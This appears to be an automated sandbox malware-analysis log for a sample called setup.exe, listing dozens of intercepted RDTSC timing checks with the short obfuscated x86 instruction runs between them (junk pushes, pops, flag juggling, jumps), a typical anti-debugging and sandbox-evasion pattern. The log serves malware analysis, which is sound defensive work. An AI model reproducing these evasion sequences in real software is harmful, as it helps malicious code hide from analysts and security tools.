Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C05B2 second address: 47C05B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C05B8 second address: 47C05BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47D0332 second address: 47D0338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4800ABA second address: 4800AEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0B4522B27h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4800AEE second address: 4800AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E0581 second address: 47E05A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0B4522B1Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E05A6 second address: 47E0605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 call 00007FE0B4F44DCDh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FE0B4F44DD7h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov ebx, esi 0x00000019 mov ebx, esi 0x0000001b popad 0x0000001c mov eax, dword ptr [ebp+08h] 0x0000001f jmp 00007FE0B4F44DCAh 0x00000024 and dword ptr [eax], 00000000h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FE0B4F44DD7h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E00A6 second address: 47E00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E00AA second address: 47E00AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E00AE second address: 47E00B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E00B4 second address: 47E0128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007FE0B4F44DD1h 0x0000000c sbb ch, 00000036h 0x0000000f jmp 00007FE0B4F44DD1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a mov ax, bx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007FE0B4F44DCEh 0x00000028 pop eax 0x00000029 pushfd 0x0000002a jmp 00007FE0B4F44DCBh 0x0000002f sub al, 0000001Eh 0x00000032 jmp 00007FE0B4F44DD9h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E0128 second address: 47E0148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 movsx edx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE0B4522B21h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E0148 second address: 47E014E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E014E second address: 47E0152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E0152 second address: 47E0156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E0312 second address: 47E0316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E0316 second address: 47E031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E031A second address: 47E0320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E0320 second address: 47E039A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE0B4F44DCEh 0x00000011 or ax, D6F8h 0x00000016 jmp 00007FE0B4F44DCBh 0x0000001b popfd 0x0000001c mov si, A42Fh 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 mov bx, D4E6h 0x00000027 mov dl, 59h 0x00000029 popad 0x0000002a xchg eax, ebp 0x0000002b jmp 00007FE0B4F44DD6h 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FE0B4F44DD7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 480028F second address: 480029C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 480029C second address: 48002A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48002A0 second address: 48002EB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE0B4522B26h 0x00000008 jmp 00007FE0B4522B25h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ah, 18h 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FE0B4522B1Ah 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov dl, D8h 0x0000001f mov esi, 64C3A205h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48002EB second address: 4800336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE0B4F44DD1h 0x00000009 and si, D8D6h 0x0000000e jmp 00007FE0B4F44DD1h 0x00000013 popfd 0x00000014 call 00007FE0B4F44DD0h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 movzx ecx, dx 0x00000025 mov ah, bh 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4800336 second address: 4800346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4522B1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4800346 second address: 4800377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, FEh 0x0000000e pushfd 0x0000000f jmp 00007FE0B4F44DD2h 0x00000014 and cl, FFFFFFB8h 0x00000017 jmp 00007FE0B4F44DCBh 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4800377 second address: 480037D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 480037D second address: 4800381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4800381 second address: 48003C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ecx 0x0000000e jmp 00007FE0B4522B26h 0x00000013 mov eax, dword ptr [778165FCh] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE0B4522B27h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48003C9 second address: 48003CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48003CF second address: 48003D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48003D3 second address: 4800415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FE0B4F44DD6h 0x00000012 je 00007FE127ED8330h 0x00000018 pushad 0x00000019 mov ecx, 014822DDh 0x0000001e mov dx, si 0x00000021 popad 0x00000022 mov ecx, eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ecx, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4800415 second address: 480041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 480041A second address: 480047A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov ebx, 7084A762h 0x00000012 jmp 00007FE0B4F44DD3h 0x00000017 popad 0x00000018 and ecx, 1Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov cl, bh 0x00000020 pushfd 0x00000021 jmp 00007FE0B4F44DCCh 0x00000026 xor ax, 8928h 0x0000002b jmp 00007FE0B4F44DCBh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4800535 second address: 4800539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4800539 second address: 480053F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 480053F second address: 4800572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0B4522B22h 0x00000013 add si, 1A98h 0x00000018 jmp 00007FE0B4522B1Bh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4800572 second address: 48005AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007FE0B4F44DD6h 0x0000000a push ecx 0x0000000b pop edi 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE0B4F44DD8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48005AE second address: 48005CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 0A8A3A2Bh 0x00000011 mov ax, 4E07h 0x00000015 popad 0x00000016 pop ebp 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0017 second address: 47B001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B001B second address: 47B001F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B001F second address: 47B0025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0025 second address: 47B0057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 movzx eax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE0B4522B1Ch 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE0B4522B27h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0057 second address: 47B0083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 push edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FE0B4F44DCDh 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE0B4F44DCDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0083 second address: 47B00F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE0B4522B27h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ecx 0x0000000d jmp 00007FE0B4522B22h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FE0B4522B1Ch 0x0000001c sbb si, A888h 0x00000021 jmp 00007FE0B4522B1Bh 0x00000026 popfd 0x00000027 call 00007FE0B4522B28h 0x0000002c pop ecx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B00F0 second address: 47B015A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FE0B4F44DD0h 0x0000000f xchg eax, ebx 0x00000010 jmp 00007FE0B4F44DD0h 0x00000015 push eax 0x00000016 pushad 0x00000017 mov dh, 94h 0x00000019 pushfd 0x0000001a jmp 00007FE0B4F44DCAh 0x0000001f sub ch, FFFFFFA8h 0x00000022 jmp 00007FE0B4F44DCBh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FE0B4F44DD0h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B015A second address: 47B0169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0169 second address: 47B016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B016F second address: 47B0173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0173 second address: 47B0177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0177 second address: 47B01B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f jmp 00007FE0B4522B26h 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE0B4522B27h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B01B7 second address: 47B01BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B01BD second address: 47B01C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B01C1 second address: 47B01CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B01CF second address: 47B01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 953Ch 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B01D8 second address: 47B01ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DD1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B01ED second address: 47B0210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, 03h 0x00000011 mov ecx, 4D38C51Bh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0210 second address: 47B025F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FE0B4F44DCEh 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FE0B4F44DCDh 0x0000001b add ah, 00000006h 0x0000001e jmp 00007FE0B4F44DD1h 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B025F second address: 47B0264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0264 second address: 47B02A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE0B4F44DD9h 0x0000000f xchg eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B02A0 second address: 47B02A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B02A4 second address: 47B02AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B02AA second address: 47B0313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 4F77h 0x00000007 pushfd 0x00000008 jmp 00007FE0B4522B1Ch 0x0000000d adc esi, 5B654768h 0x00000013 jmp 00007FE0B4522B1Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test esi, esi 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FE0B4522B24h 0x00000025 jmp 00007FE0B4522B25h 0x0000002a popfd 0x0000002b push eax 0x0000002c movsx ebx, cx 0x0000002f pop ecx 0x00000030 popad 0x00000031 je 00007FE127500E24h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0313 second address: 47B0323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0323 second address: 47B0385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov al, 7Ah 0x00000013 pushfd 0x00000014 jmp 00007FE0B4522B21h 0x00000019 jmp 00007FE0B4522B1Bh 0x0000001e popfd 0x0000001f popad 0x00000020 je 00007FE127500DE6h 0x00000026 pushad 0x00000027 mov eax, 43C86A0Bh 0x0000002c mov bh, cl 0x0000002e popad 0x0000002f mov edx, dword ptr [esi+44h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FE0B4522B26h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0385 second address: 47B0397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DCEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0397 second address: 47B03C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE0B4522B25h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B03C2 second address: 47B0448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE0B4F44DD7h 0x00000009 sub si, 239Eh 0x0000000e jmp 00007FE0B4F44DD9h 0x00000013 popfd 0x00000014 mov ch, 33h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test edx, 61000000h 0x0000001f jmp 00007FE0B4F44DD3h 0x00000024 jne 00007FE127F23034h 0x0000002a jmp 00007FE0B4F44DD6h 0x0000002f test byte ptr [esi+48h], 00000001h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FE0B4F44DCAh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0448 second address: 47B044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B044E second address: 47B046C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FE127F23007h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B046C second address: 47B0470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0470 second address: 47B0476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0476 second address: 47B047C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B047C second address: 47B0480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A070D second address: 47A0728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 6367EA99h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE0B4522B1Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0728 second address: 47A0740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0740 second address: 47A0777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b jmp 00007FE0B4522B27h 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE0B4522B20h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0777 second address: 47A077D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A077D second address: 47A079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 5583h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE0B4522B21h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A079F second address: 47A07A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
